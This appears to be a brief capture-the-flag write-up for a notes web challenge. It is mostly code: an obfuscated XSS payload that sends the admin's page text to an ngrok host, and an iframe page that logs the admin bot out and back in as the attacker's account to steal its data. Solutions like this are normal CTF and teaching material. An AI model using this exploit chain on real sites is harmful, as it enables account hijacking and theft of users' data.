First - XSS on the User
```
<http://g<!s://q?<!-<<script>top.admin.location='https://196cffb1.ngrok.io/?data='+JSON.stringify(top.admin.document.getElementsByClassName('is-4')[0].textContent.trim());/*->a><http://g<!s://g.c?<!-<a*/</script>alert(13);/*->a>
```
Second - Create a page with two iframes. One iframe keeps the admin's session open; in the other one:
- Log out
- Log in with your XSS user
- Control the admin iframe from the XSS and exfiltrate the data
- Load a big image so the bot does not leave the page while the iframes are loading
```html
<html>
<script type="text/javascript">
// Main page:
window.onmessage = function(event) {
  console.log('receive data', event.data);
};
const TIMEOUT = 2000;
document.addEventListener('DOMContentLoaded', (event) => {
  console.log('entrou aqui??');
  setTimeout(() => {
    // "user" is the name of the first iframe below
    user.location.href = "http://notes.web.byteband.it/logout";
    console.log('logged out');
    setTimeout(() => {
      user.location.href = "http://notes.web.byteband.it/login?username=zeus&password=zeus";
      console.log('logged in');
    }, TIMEOUT);
  }, TIMEOUT);
});
</script>
<img width="100" height="100" src="https://effigis.com/wp-content/uploads/2015/02/DigitalGlobe_WorldView2_50cm_8bit_Pansharpened_RGB_DRA_Rome_Italy_2009DEC10_8bits_sub_r_1.jpg" />
<iframe name="user" width=1000 height=200 src="http://notes.web.byteband.it/profile"></iframe>
<hr/>
<iframe name="admin" width=1000 height=200 src="http://notes.web.byteband.it/profile"></iframe>
</html>
```